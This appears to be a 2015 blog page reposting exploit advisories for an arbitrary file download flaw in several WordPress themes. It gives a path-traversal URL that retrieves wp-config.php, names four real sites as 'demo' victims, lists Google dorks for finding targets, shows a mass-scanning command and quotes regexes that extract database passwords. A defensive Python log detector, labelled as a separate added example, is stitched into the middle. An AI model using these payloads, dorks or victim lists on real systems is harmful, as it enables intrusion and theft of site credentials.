Sunday, 18 January 2015

Arbitrary File Download vulnerability in the WordPress Bretheon theme


Arbitrary File Download vulnerability, which I call A.F.D.
This flaw was found in the WordPress Bretheon theme.
--------------------------------------------------------------------------------------------------------------
DETAILS
Source: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Windows

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Since this flaw in the theme uses nothing new and follows the usual path "admin-ajax.php?action=revslider_show_image&img=", the exploit we developed months ago already performs this check and can be used as-is.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]:

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETAILS:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

Friday, 2 January 2015

Wordpress A.F.D Verification/ INURL - BRASIL - WORDPRESS THEMES DOWNLOAD.PHP FILE DISCLOSURE


Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.

------------------------------------------------------------------------------
# *NAME*:      Wordpress A.F.D Verification/ INURL - BRASIL
# *TYPE*:      Arbitrary File Download
# *Tested on*: Linux
# *EXECUTE*:   php exploit.php www.target.gov.us
# *OUTPUT*:    WORDPRES_A_F_D.txt
# *AUTHOR*:    GoogleINURL
# *EMAIL*:     [email protected]
# *Blog*:      http://blog.inurl.com.br
# *Twitter*:   https://twitter.com/googleinurl
# *Fanpage*:   https://fb.com/InurlBrasil
# *GIT*:       https://github.com/googleinurl
# *YOUTUBE*:   https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY*: http://packetstormsecurity.com/user/googleinurl/
#
------------------------------------------------------------------------------
# Command Exec Scanner INURLBR:
#
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------

Description:

This exploit allows an attacker to exploit the Arbitrary File Download flaw
in dozens of WordPress themes.
Using regular expressions, the script checks each target URL by requesting
its wp-config.php file and extracting the database settings from the response body.
Regular expressions (PHP, with parentheses used as the pattern delimiters):
preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
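As an added example (not code from either post and not the INURL script), here is a defender-side detector that scans web-server access logs for the two request shapes this page describes: the admin-ajax.php revslider_show_image call with a traversal in img (first post) and a theme download.php call with a traversal in its file parameter (second post). The log lines, IPs, the theme path and the "file" parameter name are constructed assumptions; only "img" and the action name come from the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache combined format); hosts and IPs are made up.
# The download.php path and its "file" parameter name are assumptions, not from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jan/2015:10:01:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Jan/2015:10:03:10 +0000] "GET /wp-content/themes/example-theme/download.php?file=../../../../wp-config.php HTTP/1.1" 403 212 "-" "curl/7.38"
192.0.2.4 - - [18/Jan/2015:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
FILE_PARAMS = ("img", "file")  # "img" is the parameter from the PoC; "file" is assumed for download.php


def is_traversal(value: str) -> bool:
    """True if a file parameter tries to leave the intended directory or names wp-config.php."""
    v = unquote(unquote(value)).replace("\\", "/")  # undo double URL-encoding as well
    return ".." in v.split("/") or v.startswith("/") or v.lower().endswith("wp-config.php")


def classify(line: str):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    qs = parse_qs(url.query, keep_blank_values=True)  # parse_qs decodes one layer of %XX
    path = url.path.lower()
    if path.endswith("/wp-admin/admin-ajax.php") and "revslider_show_image" in qs.get("action", []):
        handler = "revslider_show_image"
    elif path.endswith("/download.php"):
        handler = "download.php"
    else:
        return None
    for param in FILE_PARAMS:
        for raw in qs.get(param, []):
            if is_traversal(raw):
                # status 200 means the file was most likely served; 403/404 means the attempt was blocked
                return {"ip": m.group("ip"), "handler": handler, "param": param,
                        "value": unquote(raw), "status": int(m.group("status"))}
    return None


def scan(log_text: str) -> list:
    """Run classify over every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

Call scan() on the contents of an access log; a finding with status 200 on wp-config.php should be treated as a credential exposure, not just an attempt.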

DORKS:

WordPress Ajax Store Locator Arbitrary File Download
Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
Google Dork:: inurl:ajax-store-locator
Google Dork:: index of ajax-store-locator

WordPress cuckootap Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/cuckootap/
Vendor Homepage:: http://www.cuckoothemes.com/

WordPress IncredibleWP Theme Arbitrary File Download
Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
Google Dork:: "Index of" & /wp-content/themes/ultimatum

WordPress Medicate Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
Google Dork:: "Index of" & /wp-content/themes/medicate/


WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

WordPress Trinity Theme Arbitrary File Download
Vendor Homepage:: https://churchthemes.net/themes/trinity/
Google Dork:: "Index of" & /wp-content/themes/trinity/

WordPress Lote27 Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/lote27/

WordPress Revslider Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
Google Dork:: wp-admin & inurl:revslider_show_image
Exploit::
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html